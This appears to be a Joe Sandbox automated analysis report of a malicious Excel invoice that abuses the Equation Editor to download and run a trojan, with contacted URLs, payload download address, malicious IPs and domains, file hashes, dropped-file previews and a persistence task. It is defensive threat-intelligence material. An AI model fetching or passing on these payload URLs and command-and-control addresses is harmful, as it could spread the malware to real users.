                          high
                          http://treyresearch.netexplorer.exe, 0000000A.00000000.1034409224.00000000046D0000.00000002.00000001.00040000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://198.12.89.166/55/vbc.exejEQNEDT32.EXE, 00000002.00000002.970273455.0000000003690000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkexplorer.exe, 0000000A.00000000.1057754396.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpfalse
                            high
                            http://java.sun.comexplorer.exe, 0000000A.00000000.999837899.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1029308104.0000000000335000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.icra.org/vocabulary/.explorer.exe, 0000000A.00000000.1057754396.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://198.12.89.166/55/vbc.exenEQNEDT32.EXE, 00000002.00000002.969951865.0000000000644000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.explorer.exe, 0000000A.00000000.1013251551.0000000001DD0000.00000002.00000001.00040000.00000000.sdmpfalse
                              high
                              http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 0000000A.00000000.1038616558.0000000008807000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1026858297.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1009597733.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1026640673.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1009836378.000000000869E000.00000004.00000001.00020000.00000000.sdmpfalse
                                high
                                http://investor.msn.com/explorer.exe, 0000000A.00000000.1055600196.0000000003B10000.00000002.00000001.00040000.00000000.sdmpfalse
                                  high
                                  http://www.piriform.com/ccleanerexplorer.exe, 0000000A.00000000.1037414892.00000000084C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1009836378.000000000869E000.00000004.00000001.00020000.00000000.sdmpfalse
                                    high
                                    http://computername/printers/printername/.printerexplorer.exe, 0000000A.00000000.1034409224.00000000046D0000.00000002.00000001.00040000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    low
                                    http://www.%s.comPAexplorer.exe, 0000000A.00000000.1013251551.0000000001DD0000.00000002.00000001.00040000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    low
                                    http://www.autoitscript.com/autoit3explorer.exe, 0000000A.00000000.999837899.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1029308104.0000000000335000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://support.mozilla.orgexplorer.exe, 0000000A.00000000.999837899.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1029308104.0000000000335000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        http://www.piriform.com/ccleanervexplorer.exe, 0000000A.00000000.1033807788.0000000004385000.00000004.00000001.00020000.00000000.sdmpfalse
                                          high
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namevbc.exe, 00000004.00000002.998332695.0000000002721000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.998529663.00000000027CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://servername/isapibackend.dllexplorer.exe, 0000000A.00000000.1006808699.0000000006450000.00000002.00000001.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            low
                                            http://198.12.89.166/55/vbc.exegEQNEDT32.EXE, 00000002.00000002.969951865.0000000000644000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs
                                            IPDomainCountryFlagASNASN NameMalicious
                                            198.12.89.166
                                            unknownUnited States
                                            36352AS-COLOCROSSINGUStrue
                                            5.183.8.183
                                            www.dems-clicks.comGermany
                                            64463INTERXSCHtrue
                                            185.53.179.171
                                            www.employeebnsf.comGermany
                                            61969TEAMINTERNET-ASDEtrue
                                            Joe Sandbox Version:34.0.0 Boulder Opal
                                            Analysis ID:626593
                                            Start date and time: 14/05/202215:09:332022-05-14 15:09:33 +02:00
                                            Joe Sandbox Product:CloudBasic
                                            Overall analysis duration:0h 13m 21s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Sample file name:PROFORMA INVOICE.xlsx
                                            Cookbook file name:defaultwindowsofficecookbook.jbs
                                            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                            Number of analysed new started processes analysed:13
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:1
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • HDC enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Detection:MAL
                                            Classification:mal100.troj.spyw.expl.evad.winXLSX@13/16@3/3
                                            EGA Information:
                                            • Successful, ratio: 100%
                                            HDC Information:
                                            • Successful, ratio: 25.5% (good quality ratio 24.3%)
                                            • Quality average: 71.1%
                                            • Quality standard deviation: 28.9%
                                            HCA Information:
                                            • Successful, ratio: 96%
                                            • Number of executed functions: 155
                                            • Number of non-executed functions: 25
                                            Cookbook Comments:
                                            • Found application associated with file extension: .xlsx
                                            • Adjust boot time
                                            • Enable AMSI
                                            • Found Word or Excel or PowerPoint or XPS Viewer
                                            • Attach to Office via COM
                                            • Scroll down
                                            • Close Viewer
                                            • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, svchost.exe
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                            • Report size getting too big, too many NtCreateFile calls found.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            TimeTypeDescription
                                            15:10:44API Interceptor88x Sleep call for process: EQNEDT32.EXE modified
                                            15:10:49API Interceptor143x Sleep call for process: vbc.exe modified
                                            15:10:58API Interceptor10x Sleep call for process: powershell.exe modified
                                            15:10:59API Interceptor1x Sleep call for process: schtasks.exe modified
                                            15:11:37API Interceptor247x Sleep call for process: mstsc.exe modified
                                            15:12:11API Interceptor1x Sleep call for process: explorer.exe modified
                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            5.183.8.183NEW ORDER LIST JUNE 2022.xlsxGet hashmaliciousBrowse
                                            • www.dems-clicks.com/n6g4/?bJEdePb=oW3KVVYfOUtMWnx9E4fO+4eOl+SZoa0wNCifvEB8Y9jnCg3EyPPrm8173PHAA8seoyylQg==&z4wh1=K2JhQ8u0d8xdq0
                                            v444BZjqsC.exeGet hashmaliciousBrowse
                                            • www.dems-clicks.com/n6g4/?j2=oW3KVVYaOTtIW39xG4fO+4eOl+SZoa0wNC6PzHd9cdjmCRbC1fenw4N50qrWEsotjxvV&6lpt=1bzlovchh8
                                            PRO.INV.xlsxGet hashmaliciousBrowse
                                            • www.dems-clicks.com/n6g4/?g8it=2dwXw8MPNFJH9&j4=oW3KVVYfOUtMWnx9E4fO+4eOl+SZoa0wNCifvEB8Y9jnCg3EyPPrm8173PHAA8seoyylQg==
                                            185.53.179.171WWVN_INVOICE_8363567453.vbsGet hashmaliciousBrowse
                                            • www.repaircilinic.com/wn19/
                                            PRO.INV.xlsxGet hashmaliciousBrowse
                                            • www.employeebnsf.com/n6g4/?g8it=2dwXw8MPNFJH9&j4=/8Ga1vKBK5Zv+SvpDfc9R87wDDB6IH5FC+aL3DgDAA8ZWL71dgMkGG8I5dFlam/RYjehgQ==&7-nw=RxoDX6DX
                                            RFQ_AP65425652_032421.exeGet hashmaliciousBrowse
                                            • www.healthebreak.com/sc21/?T0GL3=BeQcCI3gxZ8kazefRQ+B1a219Kf9j/7UZZGDQ4Fgc3CNO9P1ko9Soc+yTo6Vt/PTSzf7&cJEHR=5j0tnfZ8
                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            www.employeebnsf.comPRO.INV.xlsxGet hashmaliciousBrowse
                                            • 185.53.179.171
                                            www.dems-clicks.comNEW ORDER LIST JUNE 2022.xlsxGet hashmaliciousBrowse
                                            • 5.183.8.183
                                            v444BZjqsC.exeGet hashmaliciousBrowse
                                            • 5.183.8.183
                                            PRO.INV.xlsxGet hashmaliciousBrowse
                                            • 5.183.8.183
                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            AS-COLOCROSSINGUS1isequal9.armGet hashmaliciousBrowse
                                            • 104.170.219.191
                                            New order.xlsxGet hashmaliciousBrowse
                                            • 104.168.33.25
                                            Bank TT slip.xlsxGet hashmaliciousBrowse
                                            • 172.245.27.27
                                            scan-copy.xlsxGet hashmaliciousBrowse
                                            • 198.12.89.207
                                            Vsl PRIDE PACIFIC .xlsxGet hashmaliciousBrowse
                                            • 107.172.93.57
                                            GujVgIhAhFGet hashmaliciousBrowse
                                            • 172.245.26.223
                                            PO 65738963578 Revise Settlement.xlsxGet hashmaliciousBrowse
                                            • 198.12.81.20
                                            PO TO GIS #0890.xlsxGet hashmaliciousBrowse
                                            • 107.175.218.31
                                            shipn_docs.xlsxGet hashmaliciousBrowse
                                            • 192.3.152.135
                                            Order_List.xlsxGet hashmaliciousBrowse
                                            • 104.168.33.12
                                            bank swiftcopy.xlsxGet hashmaliciousBrowse
                                            • 198.12.91.249
                                            Paymentnotification115.xlsxGet hashmaliciousBrowse
                                            • 192.3.121.203
                                            ORDER M52022.xlsxGet hashmaliciousBrowse
                                            • 107.175.3.53
                                            Product_List.xlsxGet hashmaliciousBrowse
                                            • 192.227.158.85
                                            Lawsuit-120522.xlsxGet hashmaliciousBrowse
                                            • 104.168.33.121
                                            New order.xlsxGet hashmaliciousBrowse
                                            • 104.168.33.25
                                            PO0975.xlsxGet hashmaliciousBrowse
                                            • 172.245.120.113
                                            soa.xlsxGet hashmaliciousBrowse
                                            • 172.245.27.27
                                            Bank Details.xlsxGet hashmaliciousBrowse
                                            • 198.12.89.207
                                            43127-20220512.xlsxGet hashmaliciousBrowse
                                            • 107.175.212.60
                                            TEAMINTERNET-ASDEproduct Enquiry.exeGet hashmaliciousBrowse
                                            • 185.53.179.174
                                            SecuriteInfo.com.Variant.Jaik.72878.26519.exeGet hashmaliciousBrowse
                                            • 185.53.179.93
                                            SecuriteInfo.com.Variant.Jaik.72878.19052.exeGet hashmaliciousBrowse
                                            • 185.53.179.170
                                            http://blindsignals.com/index.php/2009/07/jquery-delayGet hashmaliciousBrowse
                                            • 185.53.177.50
                                            nuevo pedido.pdf.exeGet hashmaliciousBrowse
                                            • 185.53.179.174
                                            WWVN_INVOICE_8363567453.vbsGet hashmaliciousBrowse
                                            • 185.53.179.171
                                            WWVN_INVOICE_8363567453.vbsGet hashmaliciousBrowse
                                            • 185.53.179.170
                                            http://blindsignals.com/index.php/2009/07/jquery-delay/Get hashmaliciousBrowse
                                            • 185.53.177.50
                                            PRO.INV.xlsxGet hashmaliciousBrowse
                                            • 185.53.179.171
                                            http://www.hubookstore.comGet hashmaliciousBrowse
                                            • 185.53.178.30
                                            Bill of Lading.exeGet hashmaliciousBrowse
                                            • 185.53.179.172
                                            Bftkdpihzmqqayhvbimrsgovwrhmxmgnqx.exeGet hashmaliciousBrowse
                                            • 185.53.179.170
                                            swift copy$48,400.exeGet hashmaliciousBrowse
                                            • 185.53.179.170
                                            New order is attached.exeGet hashmaliciousBrowse
                                            • 185.53.177.51
                                            Confirmation Transfer Ref_MT103_002345689109920098.exeGet hashmaliciousBrowse
                                            • 185.53.178.51
                                            DgMnD2zCnE.exeGet hashmaliciousBrowse
                                            • 185.53.177.50
                                            Zahlungsaviso.exeGet hashmaliciousBrowse
                                            • 185.53.179.93
                                            knLUdROliq.exeGet hashmaliciousBrowse
                                            • 185.53.177.31
                                            bena.exeGet hashmaliciousBrowse
                                            • 185.53.179.172
                                            Urgentn#U00a1 objedn#U00a0vka.pdf.exeGet hashmaliciousBrowse
                                            • 185.53.179.91
                                            INTERXSCHNEW ORDER LIST JUNE 2022.xlsxGet hashmaliciousBrowse
                                            • 5.183.8.183
                                            v444BZjqsC.exeGet hashmaliciousBrowse
                                            • 5.183.8.183
                                            Payment confirmation reference.exeGet hashmaliciousBrowse
                                            • 5.183.8.187
                                            PRO.INV.xlsxGet hashmaliciousBrowse
                                            • 5.183.8.183
                                            SecuriteInfo.com.Trojan.Siggen17.48628.31246.exeGet hashmaliciousBrowse
                                            • 5.183.8.28
                                            No context
                                            No context
                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:downloaded
                                            Size (bytes):731648
                                            Entropy (8bit):7.625561793309267
                                            Encrypted:false
                                            SSDEEP:12288:WQ4QvzJDpg1Hu8jdWmNPNZ0Lwrftg3znNWTTgbSbRdpGReKfgOz6:/4Qvl1g1OC90Mrfm3zncTTRRiZgR
                                            MD5:F7ECD12D134AAF3541396C78337CE672
                                            SHA1:BB41A84D4F5EEF537E41CF4BDE375C99BFF86A04
                                            SHA-256:EC2F5710FDF33C7B843829EBD9F088B15141B643B4354DD92D39B6E290CECA70
                                            SHA-512:EF70EB852B370E5F29CA4D27584A3FAAD34A629C857E135F434B21E483C24FC813FE97FFF77EB73DAE428FD3E97FB82C3564EAE03A18D8BFD0F1A71BA3C9F77A
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            Reputation:unknown
                                            IE Cache URL:http://198.12.89.166/55/vbc.exe
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Og.b..............0.. ...........?... ...@....@.. ....................................@..................................>..O....@.......................`....................................................... ............... ..H............text........ ... .................. ..`.rsrc........@......."..............@..@.reloc.......`.......(..............@..B.................>......H............G...............=..........................................&.(......*F.(........(.....**..(......*....(......*....(......*..{....*"..}....*&.(......*F.(........(.....**..(......*....(......*....(......*..0...........(.....o......o.....+..*.0...........(.....o......o.....+..*.0...........(.....o.......o.....+..*....0...........(.....o.......o.....+..*....0.. ........(.....o.......o......o$....+..*.0.. ........(.....o.......o......o$....+..*.(....o....*.(....o....*
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:ms-windows metafont .wmf
                                            Category:dropped
                                            Size (bytes):4630
                                            Entropy (8bit):5.070400845866794
                                            Encrypted:false
                                            SSDEEP:96:RmljFSTwLmSaj2W67xYK2dlEtF622okgmCCHtkTl9ggBgThsMihEylB8By98Rj:UlRSkCSajh6tL2dlEtFV2VgmVNkTl9gJ
                                            MD5:1A4FF280B6D51A6ED16C3720AF1CD6EE
                                            SHA1:277878BEF42DAC8BB79E15D3229D7EEC37CE22D9
                                            SHA-256:E5D86DD19EE52EBE2DA67837BA4C64454E26B7593FAC8003976D74FF848956E7
                                            SHA-512:3D41BAF77B0BEEF85C112FCBD3BE30E940AF1E586C4F9925DBDD67544C5834ED794D0042A6F6FF272B21D1106D798CBB05FA2848A788A3DAFE9CFBC8574FCECA
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:...................[R..................................D.^...................-...................".....-...........................".....-.....................-...............$...........o.............................-...............-.......-.....................-...............$.......W.....i...T.........-...............-.......-.....................-...........>...$.....~.........................z...m.....H.v.....?.........................|...r...f...Z...L...>...0... .............~.....-...............-.......-.....................-...........6...$.....................................-...?...U...n...........!...!.........................................-...............-.......-.....................-...........8...$.......................s...e.g.\.L.Y./.[..._...g...p...~.............'.../...L.v.g.i...V...@...'...............-...............-.......-.....................-........... ...$.......................r...{...................................-...............-.......-...........
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                            Category:dropped
                                            Size (bytes):223752
                                            Entropy (8bit):3.2805343869701504
                                            Encrypted:false
                                            SSDEEP:1536:gAGsM8yOYZWQ99d99H9999999lN6Hz8iiiiiiiiiiiiiiiPnHnbq+QVwtaKfdL4a:gMMVNSztnZft6rMMVNSztnZft6u
                                            MD5:8E3A74F7AA420B02D34C69E625969C0A
                                            SHA1:4743F57F0F702C5B47FA1668D9173E08ADA16448
                                            SHA-256:0CD83C55739629F98FE6AFD3E25A5BCBB346CBEF58BC592C1260E9F0FA8575A9
                                            SHA-512:ADE6B91E260AFA08CC286471D0AD7BCA82FF5E1FE506D48B37A13E3CDD2717171CDAC38C77CFF18FD4C26CA9470B002B63B7FDDC0466FC6F7010A772BF557054
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:....l................................... EMF.....j..........................8...X....................?......F...........GDIC...............p.........8.........................F...........................A. ...........F.......(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:ms-windows metafont .wmf
                                            Category:dropped
                                            Size (bytes):1970
                                            Entropy (8bit):5.125773446782967
                                            Encrypted:false
                                            SSDEEP:48:KxK48S3oEL48I+KL48uL48kL48tnL48I0L48Ih2L48Ls4fnPK6L48tOL48bCb3RM:KxKS3okSuEtN1O2FfUcM
                                            MD5:30935B0D56A69E2E57355F8033ADF98B
                                            SHA1:5F7C13E36023A1B3B3DAF030291C02631347C2AB
                                            SHA-256:077232D301E2DF2E2702BD9E7323806AC20134F989C8A4102403ECBF5E91485E
                                            SHA-512:5D633D1EC5559443D3DA5FAD2C0CFC5DBF6A006EF6FBEE8C47595A916A899FBDF713897289E99EE62C07B52CCB61578253791AC57712DF040469F21287A742E9
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:.....F.>...u........R........................u.F.............................-...................".....-...........................".....-....................-...........F...$.!.....!...*...2...9...?...C...F...G...F...C...?...9...2...*...!.........................................................................................-...............-.......-....................-...............$...[...6._...x.[.......-...............-.......-....................-...............$...o.D...x.#.w...G.o.D.....-...............-.......-....................-...............$.........!.V.{...y.............-...............-.......-....................-...............$.....M.w...n.@.[.....M.....-...............-.......-....................-...............$.......f...Q...........-...............-.......-....................-...............$...'.U.....K...'.U.....-...............-.......-....................-...............$.c...u...\...D...,.........j...S...=...%.........x...c...N...:...&.v...p...
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:ms-windows metafont .wmf
                                            Category:dropped
                                            Size (bytes):4630
                                            Entropy (8bit):5.070400845866794
                                            Encrypted:false
                                            SSDEEP:96:RmljFSTwLmSaj2W67xYK2dlEtF622okgmCCHtkTl9ggBgThsMihEylB8By98Rj:UlRSkCSajh6tL2dlEtFV2VgmVNkTl9gJ
                                            MD5:1A4FF280B6D51A6ED16C3720AF1CD6EE
                                            SHA1:277878BEF42DAC8BB79E15D3229D7EEC37CE22D9
                                            SHA-256:E5D86DD19EE52EBE2DA67837BA4C64454E26B7593FAC8003976D74FF848956E7
                                            SHA-512:3D41BAF77B0BEEF85C112FCBD3BE30E940AF1E586C4F9925DBDD67544C5834ED794D0042A6F6FF272B21D1106D798CBB05FA2848A788A3DAFE9CFBC8574FCECA
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:...................[R..................................D.^...................-...................".....-...........................".....-.....................-...............$...........o.............................-...............-.......-.....................-...............$.......W.....i...T.........-...............-.......-.....................-...........>...$.....~.........................z...m.....H.v.....?.........................|...r...f...Z...L...>...0... .............~.....-...............-.......-.....................-...........6...$.....................................-...?...U...n...........!...!.........................................-...............-.......-.....................-...........8...$.......................s...e.g.\.L.Y./.[..._...g...p...~.............'.../...L.v.g.i...V...@...'...............-...............-.......-.....................-........... ...$.......................r...{...................................-...............-.......-...........
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:ms-windows metafont .wmf
                                            Category:dropped
                                            Size (bytes):1970
                                            Entropy (8bit):5.125773446782967
                                            Encrypted:false
                                            SSDEEP:48:KxK48S3oEL48I+KL48uL48kL48tnL48I0L48Ih2L48Ls4fnPK6L48tOL48bCb3RM:KxKS3okSuEtN1O2FfUcM
                                            MD5:30935B0D56A69E2E57355F8033ADF98B
                                            SHA1:5F7C13E36023A1B3B3DAF030291C02631347C2AB
                                            SHA-256:077232D301E2DF2E2702BD9E7323806AC20134F989C8A4102403ECBF5E91485E
                                            SHA-512:5D633D1EC5559443D3DA5FAD2C0CFC5DBF6A006EF6FBEE8C47595A916A899FBDF713897289E99EE62C07B52CCB61578253791AC57712DF040469F21287A742E9
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:.....F.>...u........R........................u.F.............................-...................".....-...........................".....-....................-...........F...$.!.....!...*...2...9...?...C...F...G...F...C...?...9...2...*...!.........................................................................................-...............-.......-....................-...............$...[...6._...x.[.......-...............-.......-....................-...............$...o.D...x.#.w...G.o.D.....-...............-.......-....................-...............$.........!.V.{...y.............-...............-.......-....................-...............$.....M.w...n.@.[.....M.....-...............-.......-....................-...............$.......f...Q...........-...............-.......-....................-...............$...'.U.....K...'.U.....-...............-.......-....................-...............$.c...u...\...D...,.........j...S...=...%.........x...c...N...:...&.v...p...
                                            Process:C:\Users\Public\vbc.exe
                                            File Type:XML 1.0 document, ASCII text
                                            Category:dropped
                                            Size (bytes):1577
                                            Entropy (8bit):5.113645733916735
                                            Encrypted:false
                                            SSDEEP:24:2di4+S2qhZ1ty1mCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNto5xvn:cgeZQYrFdOFzOzN33ODOiDdKrsuTovv
                                            MD5:FDC08A9D9384CA53A1F040486088074E
                                            SHA1:BF3EE025224AE243E0B9DBB9A3C3A654176B0709
                                            SHA-256:BC94AB97074174934C306ED9FE72253914EE774FD143A696D995B4D8592D259E
                                            SHA-512:B3773A3B20216F20BA79C49DB1F7380E3FEDD10643CBA71746881F67B0EA039595AF440109D1A8B89336A5892948D4C0E33987D325FDFECAF2F945775FCCED91
                                            Malicious:true
                                            Reputation:unknown
                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):512
                                            Entropy (8bit):0.0
                                            Encrypted:false
                                            SSDEEP:3::
                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):512
                                            Entropy (8bit):0.0
                                            Encrypted:false
                                            SSDEEP:3::
                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:CDFV2 Encrypted
                                            Category:dropped
                                            Size (bytes):95744
                                            Entropy (8bit):7.91695700296717
                                            Encrypted:false
                                            SSDEEP:1536:c3ir/an65WHrmE9mfKMkBIvMBMVMO9C9SpX5xhhgD7uJbbi+7MgFlUveeAM:cSW68Lm/fKMk6tHCWToIXi+/nTF
                                            MD5:5B9DDBDF0A0AF0788EECEEACEC2F0295
                                            SHA1:77687D59ABBD0B3C4EECC80ABBE30D33A47E781C
                                            SHA-256:E11F7D510B899E00E0CF10DC360400FD38F180E9C72F42C465C3A470075CD9EA
                                            SHA-512:1657E35379AA82ABE0EDD01DA1CF97CB6BBABCDE9788C2E7B433F12DF627320F29A519A502D71E66B39A40CD5DD908594C907CD69EACBCEAB797BFAC6085CCF7
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):512
                                            Entropy (8bit):0.0
                                            Encrypted:false
                                            SSDEEP:3::
                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):8016
                                            Entropy (8bit):3.5864064270168288
                                            Encrypted:false
                                            SSDEEP:96:chQCAMqGqvsqvJCwoLz8hQCAMqGqvsEHyqvJCworJzG7KrlHggx8+lUVdBb:cm7oLz8mvHnorJzGmigx87Bb
                                            MD5:46F08F94CD341EF8C7FBA87CBCE16DA9
                                            SHA1:9CFAA57A020F6B91F77BF33DFB601AA37E0C8BCA
                                            SHA-256:08A7E978FECF8831DA15E753F1BDE5AFA2C5E9E346AEA2D779025F125FECF54D
                                            SHA-512:CA273C0212C496649A36420342F519F36397A4682853EE763104175C0701F312BF7DA82C2FC688F45E7D8EDF977CF3CE9694FF1A94DFBAC24051599068BCC1D5
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT...Programs..f.......:..hT.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):8016
                                            Entropy (8bit):3.5864064270168288
                                            Encrypted:false
                                            SSDEEP:96:chQCAMqGqvsqvJCwoLz8hQCAMqGqvsEHyqvJCworJzG7KrlHggx8+lUVdBb:cm7oLz8mvHnorJzGmigx87Bb
